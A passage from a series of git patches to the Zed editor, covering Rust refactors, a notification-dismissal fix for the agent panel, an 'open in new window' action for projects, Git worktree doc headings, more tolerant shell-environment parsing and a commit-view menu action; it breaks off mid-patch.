ContextProvider for PythonContextProvider { Ok(task::TaskVariables::from_iter( test_target .into_iter() - .chain(module_target.into_iter()) + .chain(module_target) .chain([toolchain]), )) }) diff --git a/crates/multi_buffer/src/multi_buffer.rs b/crates/multi_buffer/src/multi_buffer.rs index 8b7b1002d96dac..de0a43bac914a8 100644 --- a/crates/multi_buffer/src/multi_buffer.rs +++ b/crates/multi_buffer/src/multi_buffer.rs @@ -3575,10 +3575,7 @@ impl MultiBufferSnapshot { continue 'anchors; }; cursor.seek_forward(path, Bias::Left); - 'excerpts: loop { - let Some(excerpt) = cursor.item() else { - break; - }; + 'excerpts: while let Some(excerpt) = cursor.item() { if excerpt.path_key != *path { break; } diff --git a/crates/multi_buffer/src/multi_buffer_tests.rs b/crates/multi_buffer/src/multi_buffer_tests.rs index a7f4b18cc42395..2f4046b8601f8a 100644 --- a/crates/multi_buffer/src/multi_buffer_tests.rs +++ b/crates/multi_buffer/src/multi_buffer_tests.rs @@ -2955,7 +2955,7 @@ impl ReferenceMultibuffer { }) .collect::>(); - new_ranges.sort_by(|l, r| l.context.start.cmp(&r.context.start)); + new_ranges.sort_by_key(|nr| nr.context.start); self.set_excerpts( path.unwrap(), @@ -3899,7 +3899,7 @@ fn mutate_excerpt_ranges( } existing_ranges.extend(ranges_to_add); - existing_ranges.sort_by(|l, r| l.start.cmp(&r.start)); + existing_ranges.sort_by_key(|r| r.start); } fn check_multibuffer( diff --git a/crates/multi_buffer/src/path_key.rs b/crates/multi_buffer/src/path_key.rs index 3af1d5be32cf3a..a2fd1ae26461b6 100644 --- a/crates/multi_buffer/src/path_key.rs +++ b/crates/multi_buffer/src/path_key.rs @@ -311,7 +311,7 @@ impl MultiBuffer { cursor.next(); } - ranges.sort_by(|l, r| l.context.start.cmp(&r.context.start)); + ranges.sort_by_key(|r| r.context.start); self.set_excerpt_ranges_for_path(path.clone(), buffer, buffer_snapshot, ranges, cx); } diff --git a/crates/project/src/lsp_store.rs b/crates/project/src/lsp_store.rs index 13d1cd90f47762..01aab2be7ac039 100644 --- 
a/crates/project/src/lsp_store.rs +++ b/crates/project/src/lsp_store.rs @@ -2969,8 +2969,8 @@ impl LocalLspStore { .flat_map(|(worktree_id, servers)| { servers .roots - .iter() - .flat_map(|(_, language_servers)| language_servers) + .values() + .flatten() .map(move |(_, (server_node, server_languages))| { (worktree_id, server_node, server_languages) }) diff --git a/crates/project/tests/integration/project_tests.rs b/crates/project/tests/integration/project_tests.rs index 6997435eb2a215..c512c893cc4551 100644 --- a/crates/project/tests/integration/project_tests.rs +++ b/crates/project/tests/integration/project_tests.rs @@ -10520,7 +10520,7 @@ fn merge_pending_ops_snapshots( t_ops.ops.push(s_op); } } - t_ops.ops.sort_by(|l, r| l.id.cmp(&r.id)); + t_ops.ops.sort_by_key(|op| op.id); } else { target.push(s_ops); } diff --git a/crates/recent_projects/src/recent_projects.rs b/crates/recent_projects/src/recent_projects.rs index b8df94c0230367..b93fa009fce193 100644 --- a/crates/recent_projects/src/recent_projects.rs +++ b/crates/recent_projects/src/recent_projects.rs @@ -220,7 +220,7 @@ fn get_open_folders(workspace: &Workspace, cx: &App) -> Vec { }) .collect(); - entries.sort_by(|a, b| a.name.to_lowercase().cmp(&b.name.to_lowercase())); + entries.sort_by_key(|entry| entry.name.to_lowercase()); entries } diff --git a/crates/snippet_provider/src/lib.rs b/crates/snippet_provider/src/lib.rs index 7edacb9af68d45..e51205678b1472 100644 --- a/crates/snippet_provider/src/lib.rs +++ b/crates/snippet_provider/src/lib.rs @@ -219,8 +219,8 @@ impl SnippetProvider { .get(language) .cloned() .unwrap_or_default() - .into_iter() - .flat_map(|(_, snippets)| snippets.into_iter()) + .into_values() + .flat_map(|snippets| snippets.into_iter()) .collect(); if LOOKUP_GLOBALS { if let Some(global_watcher) = cx.try_global::() { diff --git a/crates/terminal_view/src/persistence.rs b/crates/terminal_view/src/persistence.rs index 50b1e350fa91a4..5c1e659b0f30bf 100644 --- 
a/crates/terminal_view/src/persistence.rs +++ b/crates/terminal_view/src/persistence.rs @@ -147,14 +147,12 @@ fn populate_pane_items( window: &mut Window, cx: &mut Context, ) { - let mut item_index = pane.items_len(); let mut active_item_index = None; - for item in items { + for (item_index, item) in (pane.items_len()..).zip(items) { if Some(item.item_id().as_u64()) == active_item { active_item_index = Some(item_index); } pane.add_item(Box::new(item), false, false, None, window, cx); - item_index += 1; } if let Some(index) = active_item_index { pane.activate_item(index, false, false, window, cx); diff --git a/crates/vim/src/helix/surround.rs b/crates/vim/src/helix/surround.rs index a1aa7b21afec0b..976a27390b3009 100644 --- a/crates/vim/src/helix/surround.rs +++ b/crates/vim/src/helix/surround.rs @@ -82,7 +82,7 @@ fn apply_helix_surround_edits( let selections = editor.selections.all_display(&display_map); let (mut edits, anchors) = build(&display_map, selections); - edits.sort_by(|a, b| b.0.start.cmp(&a.0.start)); + edits.sort_by_key(|edit| edit.0.start); editor.edit(edits, cx); editor.change_selections(Default::default(), window, cx, |s| { diff --git a/crates/vim/src/state.rs b/crates/vim/src/state.rs index 3bd4c0a5b804c1..3ca4d704c7ced6 100644 --- a/crates/vim/src/state.rs +++ b/crates/vim/src/state.rs @@ -1411,7 +1411,7 @@ impl RegistersView { }) } }); - matches.sort_by(|a, b| a.name.cmp(&b.name)); + matches.sort_by_key(|m| m.name); let delegate = RegistersViewDelegate { selected_index: 0, matches, diff --git a/crates/worktree/src/worktree.rs b/crates/worktree/src/worktree.rs index 3f58448d312ae6..c34f358bc84562 100644 --- a/crates/worktree/src/worktree.rs +++ b/crates/worktree/src/worktree.rs @@ -5019,7 +5019,7 @@ impl BackgroundScanner { } } - for (path, metadata) in relative_paths.iter().zip(metadata.into_iter()) { + for (path, metadata) in relative_paths.iter().zip(metadata) { let abs_path: Arc = root_abs_path.join(path.as_std_path()).into(); match metadata { 
Ok(Some((metadata, canonical_path))) => { diff --git a/crates/zeta_prompt/src/multi_region.rs b/crates/zeta_prompt/src/multi_region.rs index 5bd486df767aac..be416b513fa7b1 100644 --- a/crates/zeta_prompt/src/multi_region.rs +++ b/crates/zeta_prompt/src/multi_region.rs @@ -611,11 +611,10 @@ fn map_boundary_offset( .saturating_sub(span_common_prefix) .saturating_sub(span_common_suffix); - if old_changed_len == 0 { - new_changed_start - } else { - new_changed_start + ((old_rel - old_changed_start) * new_changed_len / old_changed_len) - } + new_changed_start + + ((old_rel - old_changed_start) * new_changed_len) + .checked_div(old_changed_len) + .unwrap_or(new_changed_len) } } diff --git a/flake.lock b/flake.lock index c32629aedd5330..7466ae522713d9 100644 --- a/flake.lock +++ b/flake.lock @@ -79,11 +79,11 @@ ] }, "locked": { - "lastModified": 1775013181, - "narHash": "sha256-zPrt6oNM1r/RO5bWYaZ3hthfG9vzkr6kQdoqDd5x4Qw=", + "lastModified": 1777346187, + "narHash": "sha256-oVxyGjpiIsrXhWTJVUOs38fZQkLjd0nZGOY9K7Kfot8=", "owner": "oxalica", "repo": "rust-overlay", - "rev": "e8046c1d9ccadd497c2344d8fa49dab62f22f7be", + "rev": "146e7bf7569b8288f24d41d806b9f584f7cfd5b5", "type": "github" }, "original": { diff --git a/rust-toolchain.toml b/rust-toolchain.toml index 15b4a8f0fc9f93..2dd2a0e6716331 100644 --- a/rust-toolchain.toml +++ b/rust-toolchain.toml @@ -1,5 +1,5 @@ [toolchain] -channel = "1.94.1" +channel = "1.95.0" profile = "minimal" components = [ "rustfmt", "clippy", "rust-analyzer", "rust-src" ] targets = [ From 60b9def5170222fd7b4128143864afa519a434f9 Mon Sep 17 00:00:00 2001 From: Kirill Bulatov Date: Wed, 29 Apr 2026 13:33:34 +0200 Subject: [PATCH 098/231] Fix the thread completion notification not dismissing when focusing the panel (#55188) Before: https://github.com/user-attachments/assets/2ea0f1ed-5189-4b27-8b1e-3f47d7684a28 After: https://github.com/user-attachments/assets/535d47b6-d6dc-41cd-a14e-d2f5d6b5a3a5 Release Notes: - Fixed the thread completion 
notification not dismissing when focusing the panel --- crates/agent_ui/src/conversation_view.rs | 156 ++++++++++++++++++++--- 1 file changed, 141 insertions(+), 15 deletions(-) diff --git a/crates/agent_ui/src/conversation_view.rs b/crates/agent_ui/src/conversation_view.rs index 3b2381f1c20747..c6ce183863ba84 100644 --- a/crates/agent_ui/src/conversation_view.rs +++ b/crates/agent_ui/src/conversation_view.rs @@ -88,7 +88,7 @@ use crate::profile_selector::{ProfileProvider, ProfileSelector}; use crate::thread_metadata_store::{ThreadId, ThreadMetadataStore}; use crate::ui::{AgentNotification, AgentNotificationEvent}; use crate::{ - Agent, AgentDiffPane, AgentInitialContent, AgentPanel, AllowAlways, AllowOnce, + Agent, AgentDiffPane, AgentInitialContent, AgentPanel, AgentPanelEvent, AllowAlways, AllowOnce, AuthorizeToolCall, ClearMessageQueue, CycleFavoriteModels, CycleModeSelector, CycleThinkingEffort, EditFirstQueuedMessage, ExpandMessageEditor, Follow, KeepAll, NewThread, OpenAddContextMenu, OpenAgentDiff, RejectAll, RejectOnce, RemoveFirstQueuedMessage, @@ -2656,23 +2656,61 @@ impl ConversationView { self.notifications.push(screen_window); - // If the user manually refocuses the original window, dismiss the popup. 
- self.notification_subscriptions + let dismiss_if_visible = { + let pop_up_weak = pop_up.downgrade(); + move |this: &ConversationView, + window: &mut Window, + cx: &mut Context| { + if this.agent_status_visible(window, cx) + && let Some(pop_up) = pop_up_weak.upgrade() + { + pop_up.update(cx, |notification, cx| { + notification.dismiss(cx); + }); + } + } + }; + + let subscriptions = self + .notification_subscriptions .entry(screen_window) - .or_insert_with(Vec::new) - .push({ - let pop_up_weak = pop_up.downgrade(); + .or_insert_with(Vec::new); - cx.observe_window_activation(window, move |this, window, cx| { - if this.agent_status_visible(window, cx) - && let Some(pop_up) = pop_up_weak.upgrade() - { - pop_up.update(cx, |notification, cx| { - notification.dismiss(cx); - }); + subscriptions.push({ + let dismiss_if_visible = dismiss_if_visible.clone(); + cx.observe_window_activation(window, move |this, window, cx| { + dismiss_if_visible(this, window, cx); + }) + }); + + if let Some(multi_workspace) = window.root::().flatten() { + let dismiss_if_visible = dismiss_if_visible.clone(); + subscriptions.push(cx.observe_in( + &multi_workspace, + window, + move |this, _, window, cx| { + dismiss_if_visible(this, window, cx); + }, + )); + } + + if let Some(panel) = self + .workspace + .upgrade() + .and_then(|workspace| workspace.read(cx).panel::(cx)) + { + subscriptions.push(cx.subscribe_in( + &panel, + window, + move |this, _, event: &AgentPanelEvent, window, cx| match event { + AgentPanelEvent::ActiveViewChanged | AgentPanelEvent::ThreadFocused => { + dismiss_if_visible(this, window, cx); } - }) - }); + AgentPanelEvent::RetainedThreadChanged + | AgentPanelEvent::ThreadInteracted { .. 
} => {} + }, + )); + } } } @@ -3889,6 +3927,94 @@ pub(crate) mod tests { ); } + #[gpui::test] + async fn test_notification_dismissed_when_sidebar_opens(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + + cx.update(|cx| { + cx.update_flags(true, vec!["agent-v2".to_string()]); + agent::ThreadStore::init_global(cx); + language_model::LanguageModelRegistry::test(cx); + ::set_global(fs.clone(), cx); + }); + + let project = Project::test(fs, [], cx).await; + let multi_workspace_handle = + cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + + let workspace = multi_workspace_handle + .read_with(cx, |mw, _cx| mw.workspace().clone()) + .unwrap(); + + let cx = &mut VisualTestContext::from_window(multi_workspace_handle.into(), cx); + + let thread_store = cx.update(|_window, cx| cx.new(|cx| ThreadStore::new(cx))); + let connection_store = + cx.update(|_window, cx| cx.new(|cx| AgentConnectionStore::new(project.clone(), cx))); + + let conversation_view = cx.update(|window, cx| { + cx.new(|cx| { + ConversationView::new( + Rc::new(StubAgentServer::default_response()), + connection_store, + Agent::Custom { id: "Test".into() }, + None, + None, + None, + None, + None, + workspace.downgrade(), + project.clone(), + Some(thread_store), + None, + "agent_panel", + window, + cx, + ) + }) + }); + + cx.run_until_parked(); + + let message_editor = message_editor(&conversation_view, cx); + message_editor.update_in(cx, |editor, window, cx| { + editor.set_text("Hello", window, cx); + }); + + active_thread(&conversation_view, cx) + .update_in(cx, |view, window, cx| view.send(window, cx)); + + cx.run_until_parked(); + + assert_eq!( + cx.windows() + .iter() + .filter(|window| window.downcast::().is_some()) + .count(), + 1, + "Expected a notification while the thread is not visible" + ); + + multi_workspace_handle + .update(cx, |mw, _window, cx| { + mw.open_sidebar(cx); + }) + .unwrap(); + + cx.run_until_parked(); + + assert_eq!( + 
cx.windows() + .iter() + .filter(|window| window.downcast::().is_some()) + .count(), + 0, + "Notification should auto-dismiss when the sidebar opens and makes the thread visible" + ); + } + #[gpui::test] async fn test_notification_when_workspace_is_background_in_multi_workspace( cx: &mut TestAppContext, From 5a38ebef606a9ab1f54ec747e03485985964dba3 Mon Sep 17 00:00:00 2001 From: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> Date: Wed, 29 Apr 2026 08:38:03 -0300 Subject: [PATCH 099/231] recent_projects: Add "open in new window" action to opened projects (#55168) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This PR adds a "open in new window" button to the projects that are already open in the current window. This matches a capability that was only available through the threads sidebar. Screenshot 2026-04-29 at 11  28@2x Release Notes: - Added the ability to move a currently open project to a new window through the recent projects modal. 
--- assets/icons/open_new_window.svg | 7 -- crates/icons/src/icons.rs | 1 - .../src/highlighted_match_with_paths.rs | 5 +- crates/recent_projects/src/recent_projects.rs | 99 ++++++++++++++++++- 4 files changed, 99 insertions(+), 13 deletions(-) delete mode 100644 assets/icons/open_new_window.svg diff --git a/assets/icons/open_new_window.svg b/assets/icons/open_new_window.svg deleted file mode 100644 index c81d49f9ff9edf..00000000000000 --- a/assets/icons/open_new_window.svg +++ /dev/null @@ -1,7 +0,0 @@ - - - - - - - diff --git a/crates/icons/src/icons.rs b/crates/icons/src/icons.rs index b49ad8e340b768..d67c4f76e62608 100644 --- a/crates/icons/src/icons.rs +++ b/crates/icons/src/icons.rs @@ -184,7 +184,6 @@ pub enum IconName { NewThread, Notepad, OpenFolder, - OpenNewWindow, Option, PageDown, PageUp, diff --git a/crates/picker/src/highlighted_match_with_paths.rs b/crates/picker/src/highlighted_match_with_paths.rs index 7c88213437feea..62bae4431244bf 100644 --- a/crates/picker/src/highlighted_match_with_paths.rs +++ b/crates/picker/src/highlighted_match_with_paths.rs @@ -52,7 +52,9 @@ impl HighlightedMatch { } impl RenderOnce for HighlightedMatch { fn render(self, _window: &mut Window, _: &mut App) -> impl IntoElement { - HighlightedLabel::new(self.text, self.highlight_positions).color(self.color) + HighlightedLabel::new(self.text, self.highlight_positions) + .color(self.color) + .truncate() } } @@ -74,6 +76,7 @@ impl HighlightedMatchWithPaths { impl RenderOnce for HighlightedMatchWithPaths { fn render(mut self, _window: &mut Window, _: &mut App) -> impl IntoElement { v_flex() + .min_w_0() .child( h_flex() .gap_1() diff --git a/crates/recent_projects/src/recent_projects.rs b/crates/recent_projects/src/recent_projects.rs index b93fa009fce193..f5b5f78fd24e30 100644 --- a/crates/recent_projects/src/recent_projects.rs +++ b/crates/recent_projects/src/recent_projects.rs @@ -1115,6 +1115,12 @@ impl PickerDelegate for RecentProjectsDelegate { return; }; + if secondary && 
key.host().is_none() && self.window_project_groups.len() >= 2 { + move_project_group_to_new_window(key, window, cx); + cx.emit(DismissEvent); + return; + } + let key = key.clone(); let path_list = key.path_list().clone(); if let Some(handle) = window.window_handle().downcast::() { @@ -1406,8 +1412,40 @@ impl PickerDelegate for RecentProjectsDelegate { }; let project_group_key = key.clone(); + let is_local = key.host().is_none(); + let has_multiple_groups = self.window_project_groups.len() >= 2; let secondary_actions = h_flex() - .gap_1() + .gap_0p5() + .when(is_local && has_multiple_groups, |this| { + this.child( + IconButton::new("move_to_new_window", IconName::ArrowUpRight) + .icon_size(IconSize::Small) + .tooltip({ + let focus_handle = self.focus_handle.clone(); + move |_, cx| { + Tooltip::for_action_in( + "Open in New Window", + &menu::SecondaryConfirm, + &focus_handle, + cx, + ) + } + }) + .on_click({ + let project_group_key = project_group_key.clone(); + cx.listener(move |_picker, _, window, cx| { + cx.stop_propagation(); + window.prevent_default(); + move_project_group_to_new_window( + &project_group_key, + window, + cx, + ); + cx.emit(DismissEvent); + }) + }), + ) + }) .when(!is_active, |this| { this.child( IconButton::new("remove_open_project", IconName::Close) @@ -1433,12 +1471,13 @@ impl PickerDelegate for RecentProjectsDelegate { Some( ListItem::new(ix) - .toggle_state(selected) .inset(true) + .toggle_state(selected) .spacing(ListItemSpacing::Sparse) .child( h_flex() .id("open_project_info_container") + .w_full() .gap_2p5() .when(self.has_any_non_local_projects, |this| { this.child(Icon::new(icon).color(Color::Muted)) @@ -1540,7 +1579,7 @@ impl PickerDelegate for RecentProjectsDelegate { ) }) .child( - IconButton::new("open_new_window", IconName::OpenNewWindow) + IconButton::new("open_new_window", IconName::ArrowUpRight) .icon_size(IconSize::Small) .tooltip({ move |_, cx| { @@ -1616,11 +1655,23 @@ impl PickerDelegate for RecentProjectsDelegate { fn 
render_footer(&self, _: &mut Window, cx: &mut Context>) -> Option { let focus_handle = self.focus_handle.clone(); let popover_style = matches!(self.style, ProjectPickerStyle::Popover); + let is_already_open_entry = matches!( self.filtered_entries.get(self.selected_index), Some(ProjectPickerEntry::OpenFolder { .. } | ProjectPickerEntry::ProjectGroup(_)) ); + let show_move_to_new_window = match self.filtered_entries.get(self.selected_index) { + Some(ProjectPickerEntry::ProjectGroup(hit)) => { + self.window_project_groups.len() >= 2 + && self + .window_project_groups + .get(hit.candidate_id) + .is_some_and(|key| key.host().is_none()) + } + _ => false, + }; + if popover_style { return Some( v_flex() @@ -1753,7 +1804,31 @@ impl PickerDelegate for RecentProjectsDelegate { }) .map(|this| { if is_already_open_entry { - this.child( + this.when(show_move_to_new_window, |this| { + this.child({ + let window_project_groups = self.window_project_groups.clone(); + let selected_index = self.selected_index; + let filtered_entries = self.filtered_entries.clone(); + Button::new("move_to_new_window", "New Window") + .key_binding(KeyBinding::for_action_in( + &menu::SecondaryConfirm, + &focus_handle, + cx, + )) + .on_click(move |_, window, cx| { + let key = match filtered_entries.get(selected_index) { + Some(ProjectPickerEntry::ProjectGroup(hit)) => { + window_project_groups.get(hit.candidate_id).cloned() + } + _ => None, + }; + if let Some(key) = key { + move_project_group_to_new_window(&key, window, cx); + } + }) + }) + }) + .child( Button::new("activate", "Activate") .key_binding(KeyBinding::for_action_in( &menu::Confirm, @@ -1930,6 +2005,22 @@ pub(crate) fn highlights_for_path( }, ) } + +fn move_project_group_to_new_window(key: &ProjectGroupKey, window: &mut Window, cx: &mut App) { + if let Some(handle) = window.window_handle().downcast::() { + let key = key.clone(); + cx.defer(move |cx| { + handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace + 
.open_project_group_in_new_window(&key, window, cx) + .detach_and_log_err(cx); + }) + .log_err(); + }); + } +} + fn open_local_project( workspace: WeakEntity, create_new_window: bool, From 8909ce484898986cbaaa3226c3f1d5873022473f Mon Sep 17 00:00:00 2001 From: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> Date: Wed, 29 Apr 2026 08:38:07 -0300 Subject: [PATCH 100/231] docs: Add headings to worktree page (#55185) Making it easier to navigate the "Git Worktrees" section in the Git page of the docs. Release Notes: - N/A --- docs/src/git.md | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/docs/src/git.md b/docs/src/git.md index aa24878ba04523..c2e19e3d88de1d 100644 --- a/docs/src/git.md +++ b/docs/src/git.md @@ -190,6 +190,8 @@ From the picker, you can: - Open an existing worktree in a new window - Delete linked worktrees that are not currently open in the project +### Worktree Management + New worktrees are created in detached HEAD state. After switching to the new worktree, use the branch picker next to the worktree picker to create a new branch or check out an existing, unused branch. This keeps Zed from accidentally checking out the same branch in multiple worktrees. @@ -199,12 +201,16 @@ By default, Zed creates worktrees under `../worktrees` relative to the repositor See [All Settings](./reference/all-settings.md#git-worktree-directory) for examples. -If your project contains multiple Git repositories (i.e., multi-root folders), Zed creates a linked worktree for each repository when creating a new worktree from the picker. -Non-Git folders in the same project are included in the new workspace as-is. +### Init Setup To run setup steps after Zed creates a linked worktree, use the [`create_worktree` task hook](./tasks.md#hooks). For agent-specific workflows, see [Worktree Isolation](./ai/parallel-agents.md#worktree-isolation). 
+### Multi-root Workspaces + +If your project contains multiple Git repositories (i.e., multi-root folders), Zed creates a linked worktree for each repository when creating a new worktree from the picker. +Non-Git folders in the same project are included in the new workspace as-is. + ## Merge Conflicts When you encounter merge conflicts after a merge, rebase, or pull, Zed highlights the conflicting regions in your files and displays resolution buttons above each conflict. From 905bea99972e3d61b1f71c6eb7b5f58e7a49e27d Mon Sep 17 00:00:00 2001 From: Anthony Eid <56899983+Anthony-Eid@users.noreply.github.com> Date: Wed, 29 Apr 2026 13:56:56 +0200 Subject: [PATCH 101/231] Accept shell environment after non-zero shell exit (#55175) Summary: When a user shell hook returned an error, Zed would fail to load the shell environment even if the captured environment output was still valid. This could prevent the terminal panel and other shell-dependent features, such as the debugger and agent panel, from creating terminals or running commands. That is especially disruptive when the shell environment is valid and a terminal could otherwise still be used. Zed now ignores the non-zero shell exit in this case when it can still parse a valid shell environment, allowing those features to continue working. Self-Review Checklist: - [x] I have reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Fixed shell environment loading when login shells exit non-zero after printing environment variables. 
--- crates/util/src/shell_env.rs | 141 +++++++++++++++++++++++++++++------ 1 file changed, 118 insertions(+), 23 deletions(-) diff --git a/crates/util/src/shell_env.rs b/crates/util/src/shell_env.rs index d12c352d541f27..ee765a9a27c553 100644 --- a/crates/util/src/shell_env.rs +++ b/crates/util/src/shell_env.rs @@ -38,6 +38,39 @@ pub async fn capture( return capture_unix(shell_path.as_ref(), args, directory.as_ref()).await; } +/// Try to parse the environment output before checking the exit status. +/// The user's shell rc files may contain commands that fail (e.g. editor +/// integrations that call posix_spawnp outside a real PTY), causing a +/// non-zero exit status even though `zed --printenv` ran successfully and +/// produced valid output on its separate fd. +fn parse_env_output( + env_output: &str, + status: &std::process::ExitStatus, + successful_capture_warning: impl FnOnce() -> String, + failed_capture_error: impl FnOnce() -> String, +) -> Result> { + match parse_env_map_from_noisy_output(env_output) { + Ok(env_map) => { + if !status.success() { + log::warn!("{}", successful_capture_warning()); + } + Ok(env_map) + } + Err(parse_error) => { + if !status.success() { + anyhow::bail!( + "{}. Failed to deserialize environment variables from json: {parse_error}. output: {env_output}", + failed_capture_error(), + ); + } + + anyhow::bail!( + "Failed to deserialize environment variables from json: {parse_error}. output: {env_output}" + ); + } + } +} + #[cfg(unix)] async fn capture_unix( shell_path: &Path, @@ -123,19 +156,25 @@ async fn capture_unix( let (env_output, process_output) = spawn_and_read_fd(command, fd_num).await?; let env_output = String::from_utf8_lossy(&env_output); - anyhow::ensure!( - process_output.status.success(), - "login shell exited with {}. 
stdout: {:?}, stderr: {:?}", - process_output.status, - String::from_utf8_lossy(&process_output.stdout), - String::from_utf8_lossy(&process_output.stderr), - ); - - // Parse the JSON output from zed --printenv - let env_map = parse_env_map_from_noisy_output(&env_output).with_context(|| { - format!("Failed to deserialize environment variables from json: {env_output}") - })?; - Ok(env_map) + parse_env_output( + &env_output, + &process_output.status, + || { + format!( + "login shell exited with {} but environment was captured successfully. stderr: {:?}", + process_output.status, + String::from_utf8_lossy(&process_output.stderr), + ) + }, + || { + format!( + "login shell exited with {}. stdout: {:?}, stderr: {:?}", + process_output.status, + String::from_utf8_lossy(&process_output.stdout), + String::from_utf8_lossy(&process_output.stderr), + ) + }, + ) } #[cfg(unix)] @@ -241,16 +280,72 @@ async fn capture_windows( .output() .await .with_context(|| format!("command {cmd:?}"))?; - anyhow::ensure!( - output.status.success(), - "Command {cmd:?} failed with {}. stdout: {:?}, stderr: {:?}", - output.status, - String::from_utf8_lossy(&output.stdout), - String::from_utf8_lossy(&output.stderr), - ); let env_output = String::from_utf8_lossy(&output.stdout); - parse_env_map_from_noisy_output(&env_output).with_context(|| { - format!("Failed to deserialize environment variables from json: {env_output}") - }) + parse_env_output( + &env_output, + &output.status, + || { + format!( + "Command {cmd:?} exited with {} but environment was captured successfully. stderr: {:?}", + output.status, + String::from_utf8_lossy(&output.stderr), + ) + }, + || { + format!( + "Command {cmd:?} failed with {}. 
stdout: {:?}, stderr: {:?}", + output.status, + String::from_utf8_lossy(&output.stdout), + String::from_utf8_lossy(&output.stderr), + ) + }, + ) +} + +#[cfg(test)] +mod tests { + use std::process::ExitStatus; + + use super::*; + use crate::path; + + #[cfg(unix)] + fn exit_status(code: i32) -> ExitStatus { + use std::os::unix::process::ExitStatusExt; + + ExitStatus::from_raw(code << 8) + } + + #[cfg(windows)] + fn exit_status(code: u32) -> ExitStatus { + use std::os::windows::process::ExitStatusExt; + + ExitStatus::from_raw(code) + } + + #[test] + fn parse_env_output_accepts_valid_env_when_shell_exits_nonzero() { + let env_json = serde_json::json!({ + "PATH": path!("/usr/bin"), + "SHELL": path!("/bin/zsh"), + }); + let env_output = format!("shell startup noise\n{env_json}\nshell shutdown noise"); + + let env_map = parse_env_output( + &env_output, + &exit_status(1), + || "shell exited with 1 but environment was captured successfully".to_string(), + || panic!("failed capture error should not be evaluated for valid environment output"), + ) + .expect("valid environment output should be returned despite non-zero shell exit"); + assert_eq!( + env_map.get("PATH").map(String::as_str), + Some(path!("/usr/bin")) + ); + assert_eq!( + env_map.get("SHELL").map(String::as_str), + Some(path!("/bin/zsh")) + ); + } } From 50ccc4122befab35659b734226797ace8a19bdee Mon Sep 17 00:00:00 2001 From: Neel Date: Wed, 29 Apr 2026 13:07:39 +0100 Subject: [PATCH 102/231] git_ui: Add option to jump to project file from commit (#55088) Using the `Open File` action from a file in commit context takes you to a read-only snapshot of the file at the point in time of the commit. This change makes it so you navigate to the current working copy of the file, if one exists. This has similar semantics to copy file reference. 
For a file that still exists at HEAD: image For a file that no longer exists: image Release Notes: - Add affordance to jump to project file from commit view --- crates/editor/src/editor.rs | 10 +++ crates/editor/src/element.rs | 15 ++++ crates/git_ui/src/commit_view.rs | 115 +++++++++++++++++++++++++++++-- 3 files changed, 136 insertions(+), 4 deletions(-) diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index c9ca01c7878939..e523ae27032284 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -902,6 +902,16 @@ pub trait Addon: 'static { None } + fn extend_buffer_header_context_menu( + &self, + menu: ui::ContextMenu, + _: &language::BufferSnapshot, + _: &mut Window, + _: &mut App, + ) -> ui::ContextMenu { + menu + } + fn override_status_for_buffer_id(&self, _: BufferId, _: &App) -> Option { None } diff --git a/crates/editor/src/element.rs b/crates/editor/src/element.rs index a6be884058ef52..69a829e578b45f 100644 --- a/crates/editor/src/element.rs +++ b/crates/editor/src/element.rs @@ -8736,6 +8736,7 @@ pub(crate) fn render_buffer_header( let file = buffer.file().cloned(); let editor = editor.clone(); + let buffer_snapshot = buffer.clone(); right_click_menu("buffer-header-context-menu") .trigger(move |_, _, _| header) @@ -8743,6 +8744,7 @@ pub(crate) fn render_buffer_header( let menu_context = focus_handle.clone(); let editor = editor.clone(); let file = file.clone(); + let buffer_snapshot = buffer_snapshot.clone(); ContextMenu::build(window, cx, move |mut menu, window, cx| { if let Some(file) = file && let Some(project) = editor.read(cx).project() @@ -8829,6 +8831,19 @@ pub(crate) fn render_buffer_header( }); } + menu = editor.update(cx, |editor, cx| { + let mut menu = menu; + for addon in editor.addons.values() { + menu = addon.extend_buffer_header_context_menu( + menu, + &buffer_snapshot, + window, + cx, + ); + } + menu + }); + menu.context(menu_context) }) }) diff --git a/crates/git_ui/src/commit_view.rs 
b/crates/git_ui/src/commit_view.rs index b3783fe2b70862..19dea7adafea3c 100644 --- a/crates/git_ui/src/commit_view.rs +++ b/crates/git_ui/src/commit_view.rs @@ -27,7 +27,7 @@ use std::{ sync::Arc, }; use theme::ActiveTheme; -use ui::{DiffStat, Divider, Tooltip, prelude::*}; +use ui::{ContextMenu, DiffStat, Divider, Tooltip, prelude::*}; use util::{ResultExt, paths::PathStyle, rel_path::RelPath, truncate_and_trailoff}; use workspace::item::TabTooltipContent; use workspace::{ @@ -42,7 +42,15 @@ use workspace::{ use crate::commit_tooltip::CommitAvatar; use crate::git_panel::GitPanel; -actions!(git, [ApplyCurrentStash, PopCurrentStash, DropCurrentStash,]); +actions!( + git, + [ + ApplyCurrentStash, + PopCurrentStash, + DropCurrentStash, + OpenFileAtHead, + ] +); pub fn init(cx: &mut App) { cx.observe_new(|workspace: &mut Workspace, _window, _cx| { @@ -65,6 +73,7 @@ pub struct CommitView { stash: Option, multibuffer: Entity, repository: Entity, + workspace: WeakEntity, remote: Option, } @@ -78,6 +87,7 @@ struct GitBlob { struct CommitDiffAddon { file_statuses: HashMap, + commit_view: WeakEntity, } impl Addon for CommitDiffAddon { @@ -92,6 +102,45 @@ impl Addon for CommitDiffAddon { ) -> Option { self.file_statuses.get(&buffer_id).copied() } + + fn extend_buffer_header_context_menu( + &self, + menu: ContextMenu, + buffer: &language::BufferSnapshot, + _window: &mut Window, + cx: &mut App, + ) -> ContextMenu { + let file_to_open = buffer.file().and_then(|file| { + let commit_view = self.commit_view.upgrade()?; + let commit_view = commit_view.read(cx); + let project_path = commit_view + .repository + .read(cx) + .repo_path_to_project_path(&RepoPath::from_rel_path(file.path()), cx)?; + let exists_at_head = commit_view + .workspace + .upgrade()? 
